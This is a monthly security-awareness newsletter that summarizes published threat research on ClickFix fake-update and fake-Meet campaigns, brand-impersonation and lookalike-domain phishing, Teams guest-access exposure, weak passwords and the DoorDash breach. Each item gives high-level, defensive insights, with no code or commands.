This is a monthly newsletter I put together for an internal security awareness program. Feel Free to grab and use for your own program.

The Most Advanced ClickFix Yet (Push Security)

Push Security researchers have uncovered a new and highly refined iteration of the “ClickFix” phishing framework, featuring modular capabilities for credential harvesting and session hijacking. This version uses advanced URL obfuscation, cloud-hosted redirects, and adaptive templates that mimic corporate login portals to bypass detection and deceive users more effectively.

Key Insights

Framework evolution: ClickFix’s latest version integrates dynamic templates and tokenized redirects to evade pattern-based blocking.

Session hijacking: Stolen authentication cookies allow attackers to access corporate accounts even when multi-factor authentication is enabled.

Cloud abuse: Hosting payloads on legitimate cloud services gives attackers credibility and helps phishing links evade automated scanning.

Rapid deployment: The phishing kits are prepackaged for affiliates, enabling faster setup and broader campaign reach.

Enterprise risk: The sophistication and modularity of ClickFix underline a trend toward professionalized phishing-as-a-service ecosystems.

Further Reading: Push Security

Minecraft, Qwerty and India123 Among 2025’s Most Common Passwords (Comparitech)

Comparitech’s latest report reveals that easily guessable passwords like “minecraft”, “qwerty”, and “india123” remain widely used despite increased awareness of password security. The findings underscore the persistent risk of weak authentication across individuals and organisations, particularly in enterprise contexts where password reuse and default credentials continue to expose systems to credential-dumping and brute-force attacks.

Key Insights

Weak passwords persist: “minecraft” topped the list of most common passwords of 2025, followed by “qwerty” and “india123”.

Password-reuse risk: Many breached credentials show repeated reuse of these weak passwords across multiple services, amplifying breach impact.

Default and predictable credentials: A significant share of password sets were based on games, simple keyboard walks (qwerty), or culturally-common strings — all easily breached.

Enterprise & IoT exposure: Weak passwords are especially problematic in business systems and connected devices where password requirements are lax and monitoring is minimal.

Actionable x-fact: Organisations should block commonly used weak passwords, enforce passphrase complexity and implement password-less or MFA approaches to reduce risk.

Further Reading: Comparitech

New Phishing Campaign Exploits Meta Business Suite to Target SMBs Across the U.S. and Beyond (Check Point Research)

Check Point Research uncovered a phishing campaign that abuses the Meta Business Suite JSON API flows to masquerade as legitimate business-management notifications. Through this abuse, attackers sent convincing lures to SMBs in the U.S. and globally, claiming billing issues or account suspension and directing victims to fake login portals. The campaign succeeded in bypassing detection by conforming to expected API patterns and dynamically generating URLs that appear unique per victim.

Key Insights

API abuse for legitimacy: Attackers used Meta’s business-management JSON callbacks to fetch business names and tailor phishing messages, increasing trust and clicks.

Global SMB targeting: While initial hits were in the U.S., the campaign expanded to over 20 countries, focusing on small and mid-sized businesses with available business-suite integrations.

Dynamic URL generation: Each phishing link was unique and time-limited, preventing bulk blocking and defeating static URL reputation databases.

Credential theft via login proxy: Victims were redirected to an Azure-hosted login page that mirrored the Meta Business Suite sign-in interface, capturing both credentials and session cookies.

Evading detection: Because the attacker-generated callback requests resembled normal Meta API traffic, email filters reliant on anomaly detection struggled to flag the messages.

Further Reading: Check Point Research – New Phishing Campaign Exploits Meta Business Suite to Target SMBs Across the U.S. and Beyond

New Phishing Attack Leverages Popular Brands to Harvest Logins (Cybersecurity News)

A recent phishing campaign delivers self-contained HTML attachments that impersonate trusted brands such as Microsoft 365, Adobe, FedEx, and DHL to harvest credentials. These attachments bypass external link filtering by embedding phishing pages directly in the email and use JavaScript to send stolen data to Telegram bots rather than traditional command-and-control servers. The campaign targets industries like agriculture, automotive, construction, and education in regions including the Czech Republic, Slovakia, Hungary, and Germany.

Key Insights

Attachment-based attack delivery: Phishing emails include HTML files with fake login portals, avoiding reliance on external links and reputation lists.

Brand impersonation at scale: Multiple major brands are mimicked to increase trust and widen the potential victim pool.

Direct data exfiltration using Telegram bots: Stolen credentials are sent directly through Telegram Bot API, reducing detection trace-paths.

Industry & regional targeting: Focused on sectors with frequent procurement flows and Central/Eastern European markets, showing deliberate target selection.

Technical evasion tactics: Use of RFC-compliant filenames (e.g., “RFQ_4460-INQUIRY.HTML”) helps disguise malicious attachments as legitimate business documents.

Further Reading: Cybersecurity News

Inside the Scattered Lapsus$ Hunters (Push Security)

Push Security analyzed the resurgence of the Scattered Lapsus$ Hunters, a cybercrime group known for high-profile data breaches and social-engineering-driven attacks. The group has evolved its techniques, targeting enterprise collaboration platforms and cloud accounts to gain unauthorized access and exfiltrate sensitive data.

Key Insights

Social engineering roots: The group continues to rely on credential theft and social manipulation rather than technical exploits.

Corporate infiltration: They focus on compromising employees with elevated permissions to reach critical systems.

Operational evolution: Recent campaigns show improved coordination and use of legitimate services for persistence and data transfer.

Brand targeting: The group’s activity spans technology, telecom, and SaaS sectors, emphasizing organizations with valuable data.

Further Reading: Push Security – Inside the Scattered Lapsus$ Hunters

New ClickFix Attack Tricks Users with ‘Fake OS Update’ to Execute Malicious Commands (Cybersecurity News)

A new iteration of the ClickFix social-engineering campaign deploys a browser-based fake Windows update prompt that simulates a system crash or update screen. Victims who follow on-screen instructions end up executing malicious commands, leading to remote access, infostealer installations, or ransomware loaders.

Key Insights

The deceptive overlay mimics a Windows update or Blue Screen of Death (BSOD) complete with progress bar and error codes, inducing urgency and fear.

Victims are instructed to perform “manual fixes” such as pressing Ctrl+Alt+Del, entering commands in a pseudo CLI, and downloading a “recovery tool” which is actually malware.

The campaign leverages both PCs and mobile devices, with full-screen simulations compatible across platforms.

Because the user initiates the commands themselves, many security tools fail to flag the activity as malicious.

This attack underlines the persistent importance of user awareness and a skeptical mindset toward unexpected system update prompts.

Further Reading: Cybersecurity News

Global Cyber Attacks Surge in October 2025 Amid Explosive Ransomware Growth and Rising GenAI Threats (Check Point Research)

In October 2025, organizations saw a sharp rise in cyber attacks, with weekly averages nearing 2,000 per organization. Ransomware activity expanded significantly, and GenAI-related risks continued to emerge as organizations adopted newly integrated AI tools.

Key Insights

Weekly attack volumes increased across most regions, with several sectors experiencing notable year-over-year growth.

Ransomware incidents rose substantially, reflecting broader adoption of opportunistic targeting.

GenAI usage introduced new exposure points, particularly around prompt-based data leakage.

Education, telecommunications, and government sectors experienced the highest attack frequency.

Further Reading: Check Point Research

DoorDash Data Breach Exposes Customer Information (USA Today)

DoorDash disclosed a security incident that exposed customer data such as names, contact details, delivery addresses, birthdays, and partial payment information.

Key Insights

Exposed data includes PII and partial payment card details.

Stolen information may be misused in phishing or fraud attempts.

Large consumer platforms remain attractive targets for attackers.

DoorDash is notifying affected users and has initiated incident response actions.

Further Reading: USA Today

Fake Windows-Update Screen Pushes Malware via ClickFix Campaign (BleepingComputer)

A new iteration of the ClickFix phishing campaign employs a fake Windows update or error screen — complete with progress bars and warning messages — to trick victims into executing malicious commands. Once the user follows the on-screen instructions, the system launches malware capable of remote access or data theft.

Key Insights

The fake update screen leverages urgency and system-failure anxiety to prompt user action.

Because execution is triggered manually by the user, many defenses fail to flag the activity.

Although targeting Windows, this style of UI-based deception could be adapted to other platforms.

The campaign highlights a shift toward interface-spoofing rather than traditional link-based phishing.

Further Reading:
BleepingComputer

Phishing Scam Uses “rn” to Fake Microsoft (Cybersecurity News)

A new phishing campaign is abusing a visual trick that replaces the letter “m” with the characters “r” and “n”, creating deceptive domains such as “rnicrosoft.com.” The substitution is subtle enough that many users overlook it, especially on mobile devices, where character spacing is tighter. Attackers use these lookalike domains to deliver convincing credential-harvesting emails and login pages that appear legitimate.

Key Insights

Attackers rely on a visually deceptive domain swap (“m” → “rn”) that closely mimics legitimate Microsoft branding.

The technique increases success rates because users often skim URLs, especially on smaller screens.

This method reflects a broader shift toward domain-based deception rather than attachment-driven phishing.

Further Reading: Cybersecurity News

B2B Guest Access Creates an Unprotected Attack Vector (Ontinue)

Microsoft’s “Chat with Anyone” capability in Teams allows users to chat with nearly any email address, but accepting a guest invite places them inside an external tenant where their organization’s security controls no longer apply. Attackers can exploit this gap to send phishing links or malicious files from low-security tenants, bypassing protections such as Safe Links and malware scanning.

Key Insights

Guest access applies the host tenant’s security controls, not the user’s home organization.

Attackers can use low-cost or trial tenants to bypass URL scanning and attachment inspection.

The feature is enabled globally by default, increasing the risk of unnoticed exposure.

External chats can function like email-borne phishing but without standard enterprise safeguards.

Further Reading: Ontinue

Weaponized Google Meet Page Uses ClickFix to Deliver Malware

Attackers are using a fake Google Meet landing page to trick users into executing malicious PowerShell commands. The site imitates the real Google Meet interface and displays a bogus camera or microphone error. It then instructs the user to run a “fix” that silently installs malware — often a Remote Access Trojan or infostealer — by copying a command to the clipboard and guiding the user to execute it through the Run dialog. Because the execution occurs outside the browser, typical browser-based protections are bypassed.

Key Insights

The attack depends entirely on social engineering, prompting users to manually run attacker-supplied commands.

Browser protections are avoided because execution happens through the operating system rather than a webpage.

The campaign leverages trust in Google Meet to lend legitimacy to the fake interface.

Forensic artifacts on infected systems can trace activity back to the malicious site.

Further Reading: Cybersecurity News